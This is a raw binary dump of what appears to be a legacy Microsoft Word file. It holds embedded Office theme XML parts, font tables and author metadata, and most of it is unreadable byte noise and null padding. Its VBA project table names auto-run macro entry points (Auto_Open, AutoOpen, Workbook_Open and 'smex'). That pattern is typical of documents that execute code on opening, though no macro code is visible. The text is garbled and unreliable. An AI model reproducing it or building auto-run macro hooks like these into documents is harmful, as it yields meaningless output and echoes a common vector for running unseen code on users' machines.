»\b„¤ï÷©=þ®‹ùá”ç \x16šª\x06ÃâC?Ëháv=¿\x7f‚É…¤§%\b[xp†£{Ûµ_¼PÑ£<Í1^[¥H¶0•\x12\x0fˆÙO¼R®BdÑÉ\x10ÒJEÛ4b$\x7f§‘q_×\x1f˜ž\x19à6LÓõ\x16R×7`®¨Éÿ³Ã0ÌžOÁ\x7f¯,åE\x04n7”Liäb¡¨/ãS½¨eªÔ\x1eе¸ùÖý\x01\0\0ÿÿ\x03\0PK\x03\x04\x14\0\x06\0\b\0\0\0!\0ky–\x16ƒ\0\0\0Š\0\0\0\x1c\0\0\0theme/theme/themeManager.xml\fÌM
à \x10@á}¡wÙ7c»(Eb²Ë®»ö\0Cœ\x1aAÇ ÒŸÛ×åãƒ7Îß\x14Õ›K\rY,œ\a\rŠeÍ.ˆ·ð|,§^[¨ÚH\x1cÅ,láÇ\x15æéx\x18É´\x13ßIÈsQ}#Ր…­µÝ Öµ+Õ!ï,Ý^¹$j=‹GWèÓ÷)âEë+&
\x028ý\x01\0\0ÿÿ\x03\0PK\x03\x04\x14\0\x06\0\b\0\0\0!\0 ¼\x18Ƶ\x06\0\0ƒ^[\0\0\x16\0\0\0theme/theme/theme1.xmlìYÏn^[E\x18¿#ñ\x0e£½·±\x13;£8UìØ\r´i£Ø-êq¼\x1eïN3»³š\x19'õ­JH DA\x1c¨\x04\8  R‹¸´ïà>C \bŠÔWà›™]{'ސ¤ ‚æ\x10{g\x7fßÿ?óÍxåò݈¡]"$åqÝ+_,yˆÄ>ïÓ8¨{7»í\vK\x1e’
Ç}ÌxLêÞˆHïòê»ï¬àe\x15’ˆ  å2®{¡RÉòÜœôa\x19Ë‹<!1¼^[p\x11a\x05"˜ë\v¼\a|#67_*-ÎE˜Æ\x1eŠq\x04lÇߌ\x7f\x1a?\x19\x1f ^[ƒ\x01õ‰·šño1\x10\x12+©\x17|&:š;Ɉ¾~¶?>\x18?\x1d?\x1e\x1f<»\aߟÂçdž¶¿SÖ\x14r$›L ]Ìê\x1eˆîó½.¹«<Ä°Tð¢î•ÌŸ7·º2‡—S"¦Ž¡ÍѵÍ_J—\x12ôwæL\x11ô&BËíJíÒú„¿\x0105‹kµZÍVyÂÏ\0°ïƒåV—<ÏJ{©ÜÈxæ@öë,ïf©Zª¸ø\x1cÿ…\x19kF£ZKu±L\rÈ~­Ìà—J‹•µy\ao@\x16_ÁW\x1akÍ梃7 ‹_œÁ·/Õ\x16+.Þ€BFã\x19´\x0eh»rŸ@\x06œm\x14—\0¾TJáS\x14dÃ$Û´ˆ\x01Õis/Âw¸h\x03&dXÑ\x18©QB\x06؇Doâ¨'(Ö\x02ñ2Á¹7vÉ—3KZ6’¾ ‰ª{ï'\x18ŠfÊïå“ï_>y„\x0e÷\x1f\x1fîÿ|xÿþáþ–‘Cµã OõâÛOþ|x\x0fýñè«\x17\x0f>+ÆË<þ×\x1f>üåé§Å@(§©:Ï??øíñÁó/>úý»\a\x05ð5{yx—FD¢ëd\x0fmó\b\f3^q5'=q6Šnˆižb-\x0e$Ž±–RÀ¿¥B\a}}„Y\x1a\x1dG\x06q=xK@;)\x02^\x19Þq\x14î„b¨hä«aä\079g\r.
½pUËʹ¹;Œƒbáb˜Çmc¼[$»‰c'¾­a\x02}5KKÇðfH\x1c5·\x18Ž\x15\x0eHL\x14Òïø\x0e!\x05ÖݦÔñë&õ\x05—| ÐmŠ\x1a˜\x16º¤K{N6M‰6h\x04q\x19\x15Ù\fñv|³y\v58+²zìºH¨
Ì
”ï\x12æ¸ñ
\x1e*\x1c\x15±ìâˆå\x1d~\r«°HÉÎHøy\K*ˆt@\x18G­>‘²ˆæ†\0{sA¿Š¡ƒ\x15†}“"\x17)\x14Ý)ây\rsžG®ófˆ£¤\bÛ¡q˜Ç¾'w E1Úâª\b¾ÉÝ
ÑÏ\x10\a\x1c\x1f^[î[”8á>¹^[ܤ£Ò4Aô›¡Ð±„ÖítàˆÆ\x7f׎\x19…~lsàüÚ14Àç_>,Ȭ7µ\x11¯ÁžTT	^[GÚïq¸£M·ÉEŸ¾ù=w\x1d\x0fã-\x02i>»ñ¼m¹o[®÷Ÿo¹ÇÕói^[í´·BÛÕsƒ\x1d’ÍÈ\x1czb\x1ePÆ:jÄÈ5i†f	ûF¿\r‹š9P’ɉ*	ákÚç\x1d\ °¡A‚«\x0f¨
;!N`à.{šI SցD	—pð3Ë…¼5\x1e†veU} °ýAbµÉûvyA/gç†	^[³û\x04æ°š	ZÐ\fN+láRÊ\x14Ì~\x15ae­Ô©¥•j¦õ9Ò&&CLgMƒÅ‰7a A0Æ€—\x17áH¯EÃA\x053Ò×~·{q\x16\x16\x13…ó\f‘\fqŸ¤1ÒvÏƨl‚”効9€Ü)ˆ‘>\x04žàµœ´šfû\x1aÒN\x13¤¼¸Ê1â²è½N”²\fžFI×ñ‘rdq¾8YŒöê^­:_õ“º7€3.|\x12ˆºÔ3 f\x01Ü%ùJØ´?±˜M•O£YË\fs‹ \f×\x18Öï3\x06;} \x11R­c\x19ÚÔ0¯Ò\x14`±–dõŸ¯‚[ÏË\0›é¯ ÅÂ\x12$ÿ¦\x05øÑ\r-\x19\fˆ¯òÁέhßÙÇ´•ò¡"¢\x13ö÷P\rÅ6†ðëT\x05{úTÂU…é\bú\x01îÙ´·Í+·9§E—¿Ý28»ŽY\x12â´Ýê\x12Í*ÙÂM\x1dOt0O9õÀ¶Bݍqg7Å”ü9™’Oãÿ™)z?›ƒ…¾Ž€\x0f7¿\x02#]¯u\v\x15rèBIHý¶€AÂô\x0eÈ\x16¸«…אTpÿl>\x05ÙÕŸ¶æ,\x0fSÖp\0TÛ4@‚Â~¤BAÈ\x16´%“}'0+§{—eÉRF&£rêÊĪÝ#»„uu\x0f\Ô{»‡BHuÓMÒ6`pGóÏ}N+¨\x17è!'_oN\x0f™ì½¶\x06þéÉÇ\x163\x18åöa3ÐdþŸ¨X°«ZzCží½yCô‹é˜Uɪ\x02„嶂ZZö¯¨Â\x19·ZÛ±f,ž¯fÊA\x14g-†ÅÉ@”Àý\x0fÒÿ`ÿ£Âgö—\f½¡vù6ôV\x04?Dhf6Õ\x17ìàtƒ´‹=\x18œì¢M&Íʺ6\x1d´×²Íúœ'݉Ü#ÎÖš&Þgtöd8sÅ9µxžÎN=ìøÚ®\x1dëjˆìÑ\x12…¥Av°11¿‚å\x7f¥â½;\x10èu¸ï\x1f2%M2ÁoN\x02ÃèÙ1u\0Åo%\x1aÒÕ¿\0\0\0ÿÿ\x03\0PK\x03\x04\x14\0\x06\0\b\0\0\0!\0\rѐŸ¶\0\0\0^[\x01\0\0'\0\0\0theme/theme/_rels/themeManager.xml.rels„M
Â0\x14„÷‚w\booÓº\x10‘&݈ЭÔ\x03„ä5\r6?$Qìí\r®,\b.‡a¾™i»—É\x13c2Þ1hª\x1a\b:é•qšÁm¸ìŽ@R\x16N‰Ù;d°`‚Žo7í\x15g‘K(M&$R(.1˜r\x0e'J“œÐŠTù€®8£Vä"£¦AÈ»ÐH÷u} ñ›\x01|Å$½b\x10{Õ\0\x19–Pšÿ³ý8\x1a‰g/\x1f\x16]þQAsÙ…\x05(¢ÆÌà#›ªL\x04Ê[ººÄß\0\0\0ÿÿ\x03\0PK\x01\x02-\0\x14\0\x06\0\b\0\0\0!\0‚Š¼\x13ú\0\0\0\x1c\x02\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0[Content_Types].xmlPK\x01\x02-\0\x14\0\x06\0\b\0\0\0!\0¥Ö§çÀ\0\0\06\x01\0\0\v\0\0\0\0\0\0\0\0\0\0\0\0\0+\x01\0\0_rels/.relsPK\x01\x02-\0\x14\0\x06\0\b\0\0\0!\0ky–\x16ƒ\0\0\0Š\0\0\0\x1c\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\x02\0\0theme/theme/themeManager.xmlPK\x01\x02-\0\x14\0\x06\0\b\0\0\0!\0 ¼\x18Ƶ\x06\0\0ƒ^[\0\0\x16\0\0\0\0\0\0\0\0\0\0\0\0\0Ñ\x02\0\0theme/theme/theme1.xmlPK\x01\x02-\0\x14\0\x06\0\b\0\0\0!\0\rѐŸ¶\0\0\0^[\x01\0\0'\0\0\0\0\0\0\0\0\0\0\0\0\0º	\0\0theme/theme/_rels/themeManager.xml.relsPK\x05\x06\0\0\0\0\x05\0\x05\0]\x01\0\0µ
\0\0\0\0<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>\0\0\0\0\x01\0\0\0\x02\0\0\0r\x01\0\0\x01\0\0\0\x01\0\0\0\x01\0ÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0\x01\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x02\0\0\0\x05\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0ÿÿ\0\0\0\0\0\0\0\0r\x01\0\0\x11\0\0\x10\0\0\0\0ÿÿÿÿ\0\b\0\0r	\0\0\x05\0\0\0\0\b\0\0ˆ\b\0\0r	\0\0\x06\0\0\0\a\0\0\0\x0f\0\0ð8\0\0\0\0\0\x06ð\x18\0\0\0\x02\b\0\0\x02\0\0\0\x04\0\0\0\x01\0\0\0\x01\0\0\0\x05\0\0\0@\0\x1eñ\x10\0\0\0ÿÿ\0\0\0\0ÿ\0€€€\0÷\0\0\x10\0\x0f\0\x02ð’\0\0\0\x10\0\bð\b\0\0\0\x01\0\0\0\x04\x04\0\0\x0f\0\x03ð0\0\0\0\x0f\0\x04ð(\0\0\0\x01\0	ð\x10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x02\0
ð\b\0\0\0\0\x04\0\0\x05\0\0\0\x0f\0\x04ðB\0\0\0\x12\0
ð\b\0\0\0\x01\x04\0\0\0\x0e\0\0S\0\vð\x1e\0\0\0¿\x01\0\0\x10\0Ë\x01\0\0\0\0ÿ\x01\0\0\b\0\x04\x03	\0\0\0?\x03\x01\0\x01\0\0\0\x11ð\x04\0\0\0\x01\0\0\0r\x01\0\0\0\0\0\0\x03\0\0\0o\0\0\0„\0\0\0m\x01\0\0n\x01\0\0n\x01\0\0o\x01\0\0p\x01\0\0s\x01\0\0\x03\0\x04\0\x03\0\x04\0\x03\0\x04\0\a\0\x04\0\a\0\0\0\0\0\x03\0\0\0o\0\0\0„\0\0\0m\x01\0\0n\x01\0\0n\x01\0\0o\x01\0\0p\x01\0\0s\x01\0\0\x03\0\x04\0\x03\0\x04\0\x03\0\x04\0\a\0\x04\0\a\0\x01\0ï\0%H\f)¼\x1aÿ\x0fÿ\x0fÿ\x0fÿ\x0fÿ\x0fÿ\x0fÿ\x0fÿ\x0fÿ\x0f\x10\0\x01\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\x10\0\0\x0f„Ð\x02\x11„˜þ^„Ð\x02`„˜þo(\0\x02\0\0\0.\0\x01\0\0\0\x04€\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„ \x05\x11„˜þ^„ \x05`„˜þ\x02\0\x01\0.\0\x01\0\0\0\x02‚\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„p\b\x11„Lÿ^„p\b`„Lÿ\x02\0\x02\0.\0\x01\0\0\0\0€\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„@\v\x11„˜þ^„@\v`„˜þ\x02\0\x03\0.\0\x01\0\0\0\x04€\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„\x10\x0e\x11„˜þ^„\x10\x0e`„˜þ\x02\0\x04\0.\0\x01\0\0\0\x02‚\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„à\x10\x11„Lÿ^„à\x10`„Lÿ\x02\0\x05\0.\0\x01\0\0\0\0€\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„°\x13\x11„˜þ^„°\x13`„˜þ\x02\0\x06\0.\0\x01\0\0\0\x04€\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„€\x16\x11„˜þ^„€\x16`„˜þ\x02\0\a\0.\0\x01\0\0\0\x02‚\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\x0f„P\x19\x11„Lÿ^„P\x19`„Lÿ\x02\0\b\0.\0\x01\0\0\0ï\0%H\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿÿÿ\x01\0\0\0\0\0ÿÿ\x01\0\0\0\x12\0\x0f\0\x19\x04\x19\0\x19\x04^[\0\x19\x04\x0f\0\x19\x04\x19\0\x19\x04^[\0\x19\x04\x0f\0\x19\x04\x19\0\x19\x04^[\0\x19\x04„\0\0\0\x04\0\0\0\b\0\0\0å\0\0\0\0\0\0\0ƒ\0\0\0Ãu\x01\0Z{\x01\0N\x06\x03\0\aK\x03\0ÈC
\0›m
\0îp\x0f\0ÁO\x12\0u4\x13\0Š	\x14\0	\x01\x17\0ò*\x18\0ß\0\x19\0”s\x19\0ñ\x03\x1c\0Üs\x1c\0^[\x12&\0³&)\0à *\0c\r,\0¦\r/\0I&/\0\x19\x013\0yK4\0\x0e\x7f8\0ü+9\0\aW9\0\x1f<:\0ÿD:\0›8@\0MW@\0\x7f9A\0	?D\0©\x14G\0{vG\0BH\0è\x19I\0¬\x06L\0½6P\0y\x04R\0Ý\fR\0Ø\x14V\0ŸpY\0…\x1fZ\0A8Z\0fLb\0³Dc\0î\x0ed\0\x03\x0ee\0E9e\0"\x16g\0z\x19g\0<gj\0ˆ!k\0ÖAt\0ÑKz\0\x1dp}\0—e~\0Vl€\0Ÿs€\0\x05'‚\0‰J†\0Ó\x14‡\0ÓCŠ\0h\vŒ\0Û\x18\0’k\0Ó"\0Öf’\0^[\b”\0¢3•\0ýL•\0åB—\0§\r˜\0"K™\0?mš\0!\x03¡\0\x19j¡\0#¢\0€t¦\0,<§\0J?§\0Á\x14©\0"/ª\08:ª\0ÒBª\0\x17\x1f«\03|­\0{+¯\0O/±\0„4±\0Ba´\0û\x1d¶\0\x17"º\0\x17<»\0a	À\0knÀ\0]\x1aÁ\0‚\x1dÂ\0å$Â\0M=Ã\0°TÅ\0c?È\0Û\x7fÈ\0\x1dUÉ\0\0}É\0u\x1dÊ\0ZlÑ\0\x18TÕ\02j×\0TÙ\0©;Û\0,9ß\0\x14pà\0ë|á\0š#å\0¸6æ\0\rcç\0I<é\0ÿCê\0\x05cê\00ï\0Ü\ò\0‘Kó\0~@ô\0Å?÷\0Ú~÷\0åTù\0ÂWù\0þ'ü\0‡\vý\0ÕYþ\0\0\0\0\0n\x01\0\0p\x01\0\0\0\0\0\0\x01\0\0\0ÿ\x01\x04\0\0\0V\0\x05\0\x03\0ÿÿ.\x10\0\0\0\0\0\0	\0\0\04\x10\0\0V\0\x06\0\x01\0ÿÿ.\x10\0\0\0\0\0\0	\0\0\04\x10\0\0V\0\a\0\0\0ÿÿ.\x10\0\0\0\0\0\0	\0\0\04\x10\0\0V\0\b\0\x02\0ÿÿ.\x10\0\0\0\0\0\0	\0\0\04\x10\0\0\x10ÿÿ\x04\0\x02\0\x1e\0P\0r\0o\0j\0e\0c\0t\0.\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0.\0A\0u\0t\0o\0_\0O\0p\0e\0n\0\x01\0\x1d\0P\0r\0o\0j\0e\0c\0t\0.\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0.\0A\0u\0t\0o\0O\0p\0e\0n\0\x01\0"\0P\0r\0o\0j\0e\0c\0t\0.\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0.\0W\0o\0r\0k\0b\0o\0o\0k\0_\0O\0p\0e\0n\0\x01\0\x19\0P\0r\0o\0j\0e\0c\0t\0.\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0.\0s\0m\0e\0x\0\x01\0\x11\x04\0\x05\0\x19\0P\0R\0O\0J\0E\0C\0T\0.\0T\0H\0I\0S\0D\0O\0C\0U\0M\0E\0N\0T\0.\0S\0M\0E\0X\0\0\0\x06\0\x1d\0P\0R\0O\0J\0E\0C\0T\0.\0T\0H\0I\0S\0D\0O\0C\0U\0M\0E\0N\0T\0.\0A\0U\0T\0O\0O\0P\0E\0N\0\0\0\a\0\x1e\0P\0R\0O\0J\0E\0C\0T\0.\0T\0H\0I\0S\0D\0O\0C\0U\0M\0E\0N\0T\0.\0A\0U\0T\0O\0_\0O\0P\0E\0N\0\0\0\b\0"\0P\0R\0O\0J\0E\0C\0T\0.\0T\0H\0I\0S\0D\0O\0C\0U\0M\0E\0N\0T\0.\0W\0O\0R\0K\0B\0O\0O\0K\0_\0O\0P\0E\0N\0\0\0@\x03€\x01\0m\x01\0\0m\x01\0\0\0è\r\x05\x01\0\x01\0m\x01\0\0\0\0\0\0m\x01\0\0\0\0\0\0\x02\x10\0\0\0\0\0\0\0r\x01\0\0ˆ\0\0\x10\0@\0\0ÿÿ\x01\0\0\0\a\0U\0n\0k\0n\0o\0w\0n\0ÿÿ\x01\0\b\0\0\0\0\0\0\0\0\0\0\0ÿÿ\x01\0\0\0\0\0ÿÿ\0\0\x02\0ÿÿ\0\0\0\0ÿÿ\0\0\x02\0ÿÿ\0\0\0\0\x05\0\0\0G\x1e\x01Ì\0\x02\x02\x06\x03\x05\x04\x05\x02\x03\x04ÿ*\0àAx\0À	\0\0\0\0\0\0\0ÿ\x01\0\0\0\0\0\0T\0i\0m\0e\0s\0 \0N\0e\0w\0 \0R\0o\0m\0a\0n\0\0\05\x1e\x01\x02\0\x05\x05\x01\x02\x01\a\x06\x02\x05\a\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\0\0€\0\0\0\0S\0y\0m\0b\0o\0l\0\0\03.\x01Ì\0\x02\v\x06\x04\x02\x02\x02\x02\x02\x04ÿ*\0àCx\0À	\0\0\0\0\0\0\0ÿ\x01\0\0\0\0\0\0A\0r\0i\0a\0l\0\0\07.\x01Ì\0\x02\x0f\x05\x02\x02\x02\x04\x03\x02\x04ÿ\x02\0áÿ¬\0@	\0\0\0\0\0\0\0Ÿ\x01\0\0\0\0\0\0C\0a\0l\0i\0b\0r\0i\0\0\0A\x1e\x01Ì\0\x02\x04\x05\x03\x05\x04\x06\x03\x02\x04ï\x02\0 ë \0B\0\0\0\0\0\0\0\0Ÿ\x01\0\0\0\0\0\0C\0a\0m\0b\0r\0i\0a\0 \0M\0a\0t\0h\0\0\0"\0\x04\01\bˆ\x18\0ðÄ\x02ã\x04h\x01\0\0\0\0\x1eé)'\x1eé)'\0\0\0\0\x02\0\x01\0\0\06\0\0\08\x01\0\0\x01\0\x01\0\0\0\x04\0\x03\x10\x02\0\0\06\0\0\08\x01\0\0\x01\0\x01\0\0\0\x02\0\0\0\0\0\0\0!\x03\0ð\x10\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Ð\x02Ð\x02´\0´\0r4\0\0\0\0\0\0\0\0\0\0\0\0\0\0m\x01\0\0m\x01\0\0\0\0\0\0cɪj\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\b3ƒQ\0ð\x10\0\b\0üý\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\bHP\0\0\0\0	ðÿ\x0f\x01\b\x01?\0\0ã\x04\0\0ÿÿÿ\x7fÿÿÿ\x7fÿÿÿ\x7fÿÿÿ\x7fÿÿÿ\x7fÿÿÿ\x7fÿÿÿ\x7f"\x16g\0\0\x04\0\02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0!\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\x1c\0\0\x04\0\0\0\0\0\0\0\0\0x\0\0\0x\0\0\0\0\0\0\0\0\0\0\0 \x05\0\0ÿÿ\x12\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0*\0\f\0W\0i\0n\0d\0o\0w\0s\0 \0U\0s\0e\0r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\0\x06\0\0\0\x01\0\0\0\0\0\f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0þÿ\0\0\x06\x01\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0à…ŸòùOh\x10«‘\b\0+'³Ù0\0\0\0\x1c\x01\0\0\r\0\0\0\x01\0\0\0p\0\0\0\x04\0\0\0x\0\0\0\a\0\0\0„\0\0\0\b\0\0\0”\0\0\0	\0\0\0¬\0\0\0\x12\0\0\0¸\0\0\0
\0\0\0Ø\0\0\0\f\0\0\0ä\0\0\0\r\0\0\0ð\0\0\0\x0e\0\0\0ü\0\0\0\x0f\0\0\0\x04\x01\0\0\x10\0\0\0\f\x01\0\0\x13\0\0\0\x14\x01\0\0\x02\0\0\0ã\x04\0\0\x1e\0\0\0\x04\0\0\0*\0\0\0\x1e\0\0\0\b\0\0\0Normal\0\0\x1e\0\0\0\x10\0\0\0Windows User\0\0\0\0\x1e\0\0\0\x04\0\0\02\0\0\0\x1e\0\0\0\x18\0\0\0Microsoft Office Word\0\0\0@\0\0\0\0FÃ#\0\0\0\0@\0\0\0\0Ä,6JÛÏ\x01@\0\0\0\0Ä,6JÛÏ\x01\x03\0\0\0\x01\0\0\0\x03\0\0\06\0\0\0\x03\0\0\08\x01\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\